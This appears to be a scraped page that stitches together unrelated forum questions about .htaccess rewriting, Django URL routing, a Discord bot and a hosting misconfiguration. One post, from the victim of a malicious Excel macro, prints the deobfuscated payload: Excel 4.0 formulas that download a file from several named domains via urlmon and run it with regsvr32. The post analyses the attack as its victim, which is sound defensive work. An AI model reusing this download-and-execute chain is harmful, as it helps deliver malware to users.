I started a new site. In my .htaccess file I thought it would be a simple matter of taking any request that didn't explicitly have a file extension in the request and rewrite to a specific file. So, for example, if the request was:
http://whatever.com/styles.css
or
http://whatever.com/funnyCats.gif
or
http://whatever.com/index.htm
...the rewrite would not apply. However, if I had a request like:
http://whatever.com/funnyCats (anything without a '.')
... I'd reroute to a special handler file. I thought that should be a simple matter of:
RewriteEngine on
# anything without a period in it is not rewritten; got a period? done as is
RewriteRule ^/[^\.]*$ dynamicActionTimeByJerryBruckheimer.php?action=$1 [I]
However, while requests with '.' are served, as expected, dynamicActionTimeByJerryBruckheimer.php is never called when '/funnyCats', 'lolololol', or anything else is requested. I get the generic IIS 404 error.
What am I doing wrong?
Related
To cut a long story short, I got duped: I opened a malicious Excel file and ran the macro.
After digging through the guts of the Excel file, the payload was highly obfuscated but I managed to piece it together:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
Note: actual full URLs above redacted to avoid accidental exposure by anyone reading this.
When accessed, the malicious URLs contain the following contents:
onlinebrandedcontent: Standard Apache file index page with no contents
onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or Javascript.
marcoantonioguerrerafitness / acceptanceh / gloselweb: Triggers download of a (presumably malicious) DLL file
It appears the code above only got as far as the onlyfansgo URL (enu.ocx on my machine contains the harmless HTML "Account Suspended" markup with a reference to webmaster#onlyfansgo.com), so it looks like I dodged a bullet (regsvr32.exe would have attempted to register a HTML file and failed).
My question: Why did the payload pull the onlyfansgo URL response but stop there? If it was willing to accept a HTML file as a successful download, why did it not stop at onlinebrandedcontent? Is it something to do with the fact that onlyfansgo is the only HTTPS URL in the list?
I would like to route all paths ending in 'search/' to one url. I have tried many ways, But nothing worked.
the following is the last that I tried.
path(r'^search/$', views.search, name="search"),
Can you please help?
After writing this, it occurs to me that you are using path which does not process regular expressions. You should probably be using url (deprecated) or re_path. If that's not it, ...
urls.py in an app is included into the master project urls.py. This results in a heirarchical structure. for example. most Django sites have a project urls.py containing
url(r'^admin/', admin.site.urls),
which dispatches any URL starting /admin to the Django admin code. that code dispatches based on the remaining part of the URL. That code's urls.py never sees /admin.
If you really want to catch anything starting /search rather than only /myapp/search you'll have to put the path or url definition in the top-level (project) urls.py. Unusual, but perfectly possible
url(r'^admin/', admin.site.urls),
path(r'search/$', search_app.views.search, name="search"),
I have no idea what the namespace will be (for reverse("dont_know:search") )
ok, so, first of all here is my code:
https://drive.google.com/file/d/1GXTp_hwFv48j1YOI-jOVU8JXmh0cklT3/view?usp=sharing
and it always says "discord" is not defined. but it is. because i have other commands that work.
I have a URL, looking below:
www.abc.com/postblog.php?url=xyz
I just want to remove [ postblog.php?url= ]. How i do this. i want my new url look like this:
www.abc.com/xyz
or
www.abc.com/blog/xyz
I am using a windows server, and i am applying both type of file web.config & .htaccess . Which one is worked and how i implement this url formation.
Check this:
https://httpd.apache.org/docs/current/howto/htaccess.html
*In general, you should only use .htaccess files when you don't have access to the main server configuration file.
Directory contains about a dozen html files. Index.html contains links to all the others.
Same directory contains hundreds of Word files. HTML files contain links to the Word files.
All links are relative, i.e., no protocol, no host, no path, and no slash.
Click on a link to an HTML file, it works. Click on a link to a word doc, browser says it can't be found. To get more precise on the error, I used wget
Oversimplified version:
wget "http://Lang-Learn.us/RTR/Immigration.html"
gives me the file I asked for, but
wget "http://Lang-Learn.us/RTR/Al otro lado.doc"
tells me that Lang-Learn.us doesn't exist (400)
Same results if I use "lang-learn.us" instead. I did verify correct casing on the filenames themselves, and also tried escaping the spaces with %20 (didn't help, not that I expected it to after the host name message).
The actual session:
MBP:~ wgroleau$ wget "http://Lang-Learn.us/RTR/Immigration.html"
--2011-03-09 00:39:51-- http://lang-learn.us/RTR/Immigration.html
Resolving lang-learn.us... 208.109.14.87
Connecting to lang-learn.us|208.109.14.87|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `Immigration.html.2'
[ <=>
] 5,973 --.-K/s in 0s
2011-03-09 00:39:51 (190 MB/s) - `Immigration.html.2' saved [5973]
MBP:~ wgroleau$ wget "http://Lang-Learn.us/RTR/Al otro lado.doc"
--2011-03-09 00:40:11-- http://lang-learn.us/RTR/Al%20otro%20lado.doc
Resolving lang-learn.us... 208.109.14.87
Connecting to lang-learn.us|208.109.14.87|:80... connected.
HTTP request sent, awaiting response... 400 No Host matches server name lang-learn.us
2011-03-09 00:40:11 ERROR 400: No Host matches server name lang-learn.us.
The error looks like an issue with redirection or domain mapping,
but how could that be turned on or off by the file extension?
The hosting provider at first tried to tell me I don't know how to write HTML, but when I mentioned I've been in software for thirty years and web work for several, he put me on hold to find someone that actually knows something. Eventually they came back and said it's MY fault for not having the correct stuff in .htaccess
Setting aside the obvious retort about it being the hosting provider's job to put the correct stuff in httpd.conf, I made a couple of attempts. But 99% of my web work has been content in HTML/PHP/perl and I know nearly nothing about .htaccess
The following two attempts did NOT work:
AddType application/msword .doc
AddType application/octet-stream .doc
UPDATE: By using
<FilesMatch "\.html$">
ForceType application/octet-stream
</FilesMatch>
I verified that the server does allow .htaccess, but using .doc instead of HTML still gets that idiotic "ERROR 400: No Host matches server name lang-learn.us"
Finally, after hours with more than one "tech supporter," I got them to admit that they had made a configuration error. Besides telling me to use .htaccess, they had an earlier suggestion that I ask the client to convert his hundreds of Word files into HTML pages.
Since the provider is the one that screwed up, there technically is no answer to the question of what can I do to fix it.